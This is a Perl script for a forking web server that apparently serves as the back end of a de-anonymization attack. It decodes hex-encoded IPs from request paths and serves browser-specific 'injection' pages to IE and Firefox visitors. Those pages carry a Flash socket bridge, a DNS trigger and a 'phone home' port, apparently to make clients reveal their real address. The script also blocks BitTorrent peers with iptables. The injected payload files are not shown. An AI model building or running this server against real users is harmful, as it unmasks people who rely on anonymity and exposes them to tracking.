#!/usr/bin/perl 

use strict;
use bytes;
use IO::Socket;
use Net::hostent;
use POSIX ":sys_wait_h";

my $listeners = 20;
my $serverport = 80;

my $serverhead = "qyq.dk";	# Host: header should match this

my $server_ip = "qyq.dk";	# value to use in web pages, probably same as 
				# server head above
my $phonehome_port = 8080;	

sub reaper {
  while ((my $child = waitpid(-1,WNOHANG)) > 0) {}
};

$SIG{'CHLD'} = \&reaper;

my $socket = IO::Socket::INET->new(     Listen => $listeners,
                                        LocalPort => $serverport,
					Reuse => 1,
                                        Proto => 'tcp');

my $content_header;
my $decodedIp;

sub findHexIP {
  my $hexIpRequest = shift;
  my ($hexIp) = $hexIpRequest =~ m/\/(........)\.h /mgs;
  my $decIp = "";
  
  my (@hexocts) = $hexIp =~ m/(..)/mgsi;
  foreach my $ho (@hexocts){
    my $decoct = pack("H*",$ho);
    $decIp .= ord($decoct);
    $decIp .= ".";
  }
  $decIp =~ s/\.$//g;
  
  print "$hexIp $decIp $hexIpRequest\n";
  
  return("$decIp");
  
}

sub loadHtml {
  my $loadthis = shift;
  my $htmlpage;
  open(my $HTML,$loadthis) or die("Can't load file $loadthis\n");
  while(sysread($HTML,my $buff,8000)){
   $htmlpage .= $buff;
  }
  return $htmlpage;
}

# we only want to spit out tons of useless data once...
my $pagecontentshown = 0;
my $standard_head;
my $dns_trigger;
my $inject_page;
my $ie_inject_page;
my $default_page;
my $sock_flash;
my $flashsocketbridge;
my $testpage;

sub loadAllHtml {

print "Loading response pages...\n" unless $pagecontentshown;
print "Loading scratch test page:\n" unless $pagecontentshown;
$testpage = &loadHtml("quacktest.html");
print $testpage unless $pagecontentshown;
print "Standard <head> tags:\n" unless $pagecontentshown;
$standard_head = &loadHtml("standard_head.html"); 
print $standard_head unless $pagecontentshown;
print "DNS trigger tags:\n" unless $pagecontentshown;
$dns_trigger = &loadHtml("dns_trigger.html");
print $dns_trigger unless $pagecontentshown;
print "Inject response (Firefox / Mozilla:\n" unless $pagecontentshown;
$inject_page = &loadHtml("inject_page.html"); 
print $inject_page unless $pagecontentshown;
print "IE Inject response page:\n" unless $pagecontentshown;
$ie_inject_page = &loadHtml("ie_inject_page.html");
print $ie_inject_page unless $pagecontentshown;
print "Default response page:\n" unless $pagecontentshown;
$default_page = &loadHtml("default_page.html"); 
print $default_page unless $pagecontentshown;
print "Loading flash socket javascript bridge:\n" unless $pagecontentshown;
$flashsocketbridge = &loadHtml("flashsocket.js");
print $flashsocketbridge unless $pagecontentshown;
print "Socket javascript connecter: (binary file)\n" unless $pagecontentshown;
$sock_flash = &loadHtml("socket.swf");

print "... loaded\n" unless $pagecontentshown;

}

&loadAllHtml();
$pagecontentshown = 1;

while(1){
  my $client = $socket->accept;
  unless(fork()){
    # child code executing now

    # reload page content
    &loadAllHtml();

    unless(defined($client)){exit;}
    my $peeraddr = $client->peerhost;
    $peeraddr .= " ";
    $peeraddr .= localtime;

    print "\n\n*** Connection from $peeraddr\n";

    # find request
    my $request;
    my $buffer;
    while(sysread($client,$buffer,1)){
        $request .= $buffer;
        if($request =~ m/\r*\n\r*\n/mgsi){
          last;
        }
    }

    my $request_front = $request;

    my $referer_tag = "NOT_DEFINED";
    # match stuff like : Referer: http://www.google.dk/
    if($request_front =~ m/Referer: /mgsi){
       $referer_tag = $request_front;
       $referer_tag =~ s/.*Referer: //gsm;
       $referer_tag =~ s/\r*\n.*//gsm;
    }

    my $response = "WIERDNESS HAPPENED. SORRY...";

    # default is to text/html
    $content_header = "text/html";

    if($request =~ m/\/socket\.swf /ms){
      print "Request for flash object from $peeraddr\n";
      $content_header = "application/x-shockwave-flash";
      $response = $sock_flash;
    }
    elsif ($request =~ m/\/quacktest.htm /mgs){
      print "Serving testpage to $peeraddr\n";
      $response = $testpage;
    }
    elsif (($request =~ m/\/........\.h /mgs) # request for hexencoded IP.h
    #or ($request =~ m/Host: $serverhead/ms)
    ){
      
      $decodedIp = &findHexIP("$request");
      $referer_tag .= "__$decodedIp";
      print "Referer: $referer_tag\n";

      if($request =~ m/MSIE/ms){
        print "Serving InternetExplorer injection page to $peeraddr\n";
        $response = $ie_inject_page;
        $referer_tag .= "(MSIE)";
      }
      elsif($request =~ m/Firefox/){
        print "Serving Firefox injection page to $peeraddr\n";
        $response = $inject_page;
        $referer_tag .= "(Firefox)";
      }
      elsif($request =~ m/Mozilla/){
        print "Serving Firefox/Mozilla injection page to $peeraddr\n";
        $response = $inject_page;
        $referer_tag .= "(Moz)";
      }
    }
    elsif($request =~ m/BitTorrent protocol/mgsi){
      print "Blocking IP $peeraddr, since they are wasting my bandwidth...\n";
      print "Add this line to your torrc, then: killall -HUP tor\n";
      print "ExitPolicy reject $peeraddr:*\n";
      
      system("iptables -I INPUT -s $peeraddr -j REJECT");
      system("iptables -I OUTPUT -s $peeraddr -j REJECT");
    }
    else{
        print "Request from $peeraddr:\n$request_front\n";
        print "Serving defaults to $peeraddr\n";
        $response = $default_page;
    }

    # generate random tag
    my $randomness = "";
    for(0 .. 10){
        my $c = 97 + rand(25);
        $c = chr($c);
        $randomness .= $c;
    }

    # replace server ip tag, standard head, DNS trigger
    $response =~ s/STANDARDHEAD/$standard_head/mgs;
    $response =~ s/FLASHBRIDGE/$flashsocketbridge/mgs; 
    $response =~ s/DNSTRIGGER/$dns_trigger/mgs;
    $response =~ s/MY_IP_TAG/$server_ip/mgs;
    $response =~ s/REFERERTAG/$referer_tag/mgs;

    # page updated with headers, triggers.
    # replace randomness within full page, including headers, triggers
    $response =~ s/RANDOMTAG/$randomness/mgs;
    
    $response =~ s/PHONEHOMEPORT/$phonehome_port/mgs;

    # write response to client

    syswrite($client,"HTTP/1.0 200 OK\r\n");
    syswrite($client,"Connection: close\r\n");
    #syswrite($client,"Cache-control: cache\r\n");
    #syswrite($client,"Expires: Sun, 17 Jan 2038 19:14:07 GMT\r\n");
    syswrite($client,"Content-Type: $content_header\r\n");
    syswrite($client,"Content-Length: " . length($response));
    syswrite($client,"\r\n\r\n$response");
    shutdown($client,2);
    #print "Closed connection to $peeraddr after response sent\n";

    exit;
  }
}
